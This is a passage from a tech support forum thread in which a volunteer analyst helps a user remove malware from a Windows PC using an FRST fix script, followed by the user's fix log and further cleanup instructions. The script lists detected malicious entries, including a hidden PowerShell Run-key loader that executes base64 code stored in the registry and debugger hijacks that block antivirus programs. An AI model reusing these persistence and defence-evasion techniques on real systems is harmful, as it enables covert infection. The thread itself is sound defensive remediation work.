    Task: {9810F01D-F471-42A3-B856-C40FC59F9803} - \{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF} -> No File <==== ATTENTION
    Task: {9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D} - \{6DE94743-B83B-4B6B-90D4-3221A25A338C} -> No File <==== ATTENTION
    Task: {9F201C7A-576B-4D43-8D9F-A4B54293FCEF} - \{C5939251-AF8C-4222-AEE8-017F4EFC29BA} -> No File <==== ATTENTION
    Task: {AF04095F-DCCD-4778-8E44-F5EBFFD2B929} - \{F7D851AA-0D16-4E69-A250-0BBEFB60741F} -> No File <==== ATTENTION
    Task: {B392518B-C4FB-46AB-97B9-C782DF67F093} - \{F05E8383-6A0D-4EC7-8387-45219DAF74DC} -> No File <==== ATTENTION
    Task: {B4849F2D-8897-4812-B999-D27BD4E24928} - \{0124643C-E010-44C2-9F26-76F3A357FEEC} -> No File <==== ATTENTION
    Task: {C04DD09C-8E8F-4EFC-BA40-76E38C017EDF} - \{83496550-34D8-473D-9C5B-22447F85749B} -> No File <==== ATTENTION
    Task: {C47C9F45-028F-489C-8034-E39D23DEF266} - System32\Tasks\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD} => pcalua.exe -a C:\Users\violeta\Downloads\qsfv236.exe -d C:\Users\violeta\Downloads
    Task: {C92C0B60-5D18-4764-96A6-F34DE2E15136} - \AdobeFlashPlayerUpdate -> No File <==== ATTENTION
    Task: {D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8} - \RealDownloaderDownloaderScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
    Task: {D97EE862-AE54-469B-BEE3-B49B10A1B715} - \{FCDC0ED4-0446-4695-8787-4841D69B92BC} -> No File <==== ATTENTION
    Task: {DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A} - System32\Tasks\Norton Security Scan for violeta => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
    Task: {E7ACA675-7025-4907-B741-CDA24CF6A000} - \{56AC13DC-CA7D-4BD2-B12C-8D196A5BA630} -> No File <==== ATTENTION
    Task: {F170349C-A3EE-4B1E-B817-A0EB7254A9AA} - \RealPlayerRealUpgradeLogonTaskS-1-5-21-3268508096-794200350-1188608446-1000 -> No File <==== ATTENTION
    Task: {FE5C0531-D94E-4827-9879-2EF8A4CF5047} - System32\Tasks\UnHackMe Task Scheduler => C:\Program Files\UnHackMe\hackmon.exe [2015-10-07] (Greatis Software)
    Task: {FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0} - \{74CF8BF1-6DC8-411D-BEAF-22DAA4FEDFAF} -> No File <==== ATTENTION
    Task: C:\Windows\Tasks\Norton Security Scan for violeta.job => C:\PROGRA~1\NORTON~2\Engine\403~1.27\Nss.exe
    Shortcut: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
    Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Покретач Chrome апликација.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (No File) <===== Cyrillic
    Shortcut: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GarrysMod\Start Garrysmod.lnk -> C:\Program Files\GarrysMod\Start.bat (No File)
    AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [119]
    AlternateDataStreams: C:\ProgramData\TEMP:AD022376 [131]
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
    HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
    HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
    IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
    IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
    ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
    ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
    ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
    Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
    HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
    URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
    FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
    FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
    FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
    FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
    CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
    CHR DefaultSearchKeyword: Profile 1 -> sweet-page
    CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>
    U0 Partizan; C:\Windows\System32\drivers\Partizan.sys [40304 2016-03-12] (Greatis Software)
    U3 am2liese; C:\Windows\system32\Drivers\am2liese.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
    C:\Windows\system32\Drivers\am2liese.sys
    C:\ProgramData\hash.dat
    C:\ProgramData\msdsrnwj.exe
    c:\users\violeta\desktop\unhackme 7.80 build 480 + crack [4realtorrentz].zip
    c:\users\violeta\desktop\sve sa desktopa\marijne stvari\rust\rust 14.03 cracked [derpteam].zip
    c:\users\violeta\documents\spore\crack\rld-spor.exe
    c:\users\violeta\music\violeta za budjenje\keygen.exe
    C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
    C:\Users\violeta\AppData\LocalLow\uTorrent
    C:\Users\violeta\AppData\Roaming\uTorrent
    Zip: C:\Users\violeta\spopoi.exe
    2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UnHackMe
    2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\Program Files\UnHackMe
    Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^<username>^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk" /f
    Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\uTorrent" /f
    EmptyTemp:
    end
  • Double-click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
  • Click the Fix button just once, and wait.
  • If you receive a message that a reboot is required, please make sure you allow it to restart normally.
  • The tool will complete its run after the restart.
  • When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Old 10-18-2016, 11:31 PM   #13



Yes, I was able to turn on System Restore. I have decided to keep BSPlayer since it was used, and still is, for media files. It was there on purpose.
Now the log:
Fix result of Farbar Recovery Scan Tool (x86) Version: 16-10-2016
Ran by violeta (19-10-2016 08:00:42) Run:1
Running from C:\Users\violeta\Desktop
Loaded Profiles: violeta (Available Profiles: violeta)
Boot Mode: Normal

==============================================


Restore point was successfully created.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4ABDBC8-1C81-42C9-BFFC-4A68511E9E4F}\\SystemComponent => value removed successfully.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A6F5703D-A4B1-4857-9EDD-DC0ABBBB0D96}\\SystemComponent => value removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{01835097-7B05-4094-B39B-A6F6BF09B715}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{01835097-7B05-4094-B39B-A6F6BF09B715}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate 2" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{05117A57-15BB-4310-AB94-ABEB78135006}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{05117A57-15BB-4310-AB94-ABEB78135006}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CFFDB85C-56BE-4D73-B744-97DB7D610B8E}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0906990C-C047-4C7D-8D22-5255F1024FB3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0906990C-C047-4C7D-8D22-5255F1024FB3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{1E9494FA-6CA3-400B-B661-31837511C7EE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C7306D1-9834-4D43-A2C5-FEFAE0216B5D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C7306D1-9834-4D43-A2C5-FEFAE0216B5D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3E27A315-206F-40D5-88C8-C29D09D3BAEB}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{258FDF9B-E6BF-4C1D-85FE-93C16438F4BE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{258FDF9B-E6BF-4C1D-85FE-93C16438F4BE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{334E8B80-9763-434E-8437-770A5DC4A520}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{334E8B80-9763-434E-8437-770A5DC4A520}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\20sve2tm" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{33C192B0-0851-4C18-BB29-6CDD784756BE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D36E943-5B4B-417D-866E-E3F85BD73E06}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D36E943-5B4B-417D-866E-E3F85BD73E06}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TuneUpUtilities_Task_BkGndMaintenance2013" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E8A2AB5-82D2-4748-9188-0E52B2B4F655}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E8A2AB5-82D2-4748-9188-0E52B2B4F655}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F0E4F20A-26C0-4803-85F3-DE100A506A22}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5E4FD528-665B-4BC7-92C3-FC3316142788}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E4FD528-665B-4BC7-92C3-FC3316142788}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{694BC2C8-C491-43DE-BBE5-75891AEE91CB}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{694BC2C8-C491-43DE-BBE5-75891AEE91CB}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0EC195FB-14E3-4A02-B5E5-AAFFE238361D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72ACF684-33A4-45E8-ACB2-EAF73F1A890E}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72ACF684-33A4-45E8-ACB2-EAF73F1A890E}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7BF7CA1C-3C80-4A51-B3A7-61A431253F64}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{74889F7C-185A-465F-8C1C-567D2DCC89F3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74889F7C-185A-465F-8C1C-567D2DCC89F3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\pimofki" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\fuwykpyf" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9810F01D-F471-42A3-B856-C40FC59F9803}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9810F01D-F471-42A3-B856-C40FC59F9803}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6DE94743-B83B-4B6B-90D4-3221A25A338C}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9F201C7A-576B-4D43-8D9F-A4B54293FCEF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F201C7A-576B-4D43-8D9F-A4B54293FCEF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C5939251-AF8C-4222-AEE8-017F4EFC29BA}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF04095F-DCCD-4778-8E44-F5EBFFD2B929}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF04095F-DCCD-4778-8E44-F5EBFFD2B929}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F7D851AA-0D16-4E69-A250-0BBEFB60741F}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B392518B-C4FB-46AB-97B9-C782DF67F093}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B392518B-C4FB-46AB-97B9-C782DF67F093}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F05E8383-6A0D-4EC7-8387-45219DAF74DC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B4849F2D-8897-4812-B999-D27BD4E24928}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4849F2D-8897-4812-B999-D27BD4E24928}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0124643C-E010-44C2-9F26-76F3A357FEEC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C04DD09C-8E8F-4EFC-BA40-76E38C017EDF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C04DD09C-8E8F-4EFC-BA40-76E38C017EDF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{83496550-34D8-473D-9C5B-22447F85749B}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C47C9F45-028F-489C-8034-E39D23DEF266}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C47C9F45-028F-489C-8034-E39D23DEF266}" => key removed successfully.
nikolap is offline  
Old 10-19-2016, 01:43 AM   #14
P.S. I forgot to attach the Upload.zip file, sorry.
Attached Files
File Type: zip Upload.zip (127.2 KB, 21 views)
nikolap is offline  
Old 10-19-2016, 07:23 PM   #15
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello again, nikolap. You're very welcome. How is the machine behaving?

------------------------------------------------------

CCleaner
TuneUp Utilities


We do not recommend the use of registry cleaners, or the registry cleaner feature of CCleaner. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling TuneUp Utilities via Programs and Features in your Control Panel.

------------------------------------------------------
  • Please submit the Upload.zip to this site ==> Submit a Malware Sample and include this link in the message->>http://www.techsupportforum.com/forums/f50/not-working-correctly-windows-firewall-1163025.html#post7257633
  • You can then delete the file from your desktop, once you have uploaded it to the above recipient.
  • Please let me know you submitted the file.
------------------------------------------------------

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click mbam-setup-2.2.1.1043.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish
  • At the end of the installation, a database update will be performed.
  • Click on Scan Now
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Remove Selected to allow MBAM to clean what was detected.
  • In most cases, a restart will be required and a prompt will be shown.
  • Wait for the prompt to restart the computer to appear, then click on Yes
  • After the restart, once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double-click on the Scan Log which shows the Date and Time of the scan just performed.
  • Click Export
  • Click Text file (*.txt)
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named File Saved should appear stating "Your file has been successfully exported".
  • Click Ok
  • Post that saved log in your next reply.
------------------------------------------------------

Uninstall the following via the Programs and Features Panel (Start->(Settings)->Control Panel->Programs->Programs and Features):

Java 8 Update 45
Java 8 Update 91


These are all outdated, and having them still installed is a security risk. Reboot your computer once all those Java components are removed.

Going forward, Java will overwrite existing installs, so removing older versions should not be required after this.

Go here and follow the prompts to install the latest Java > https://java.com/en/

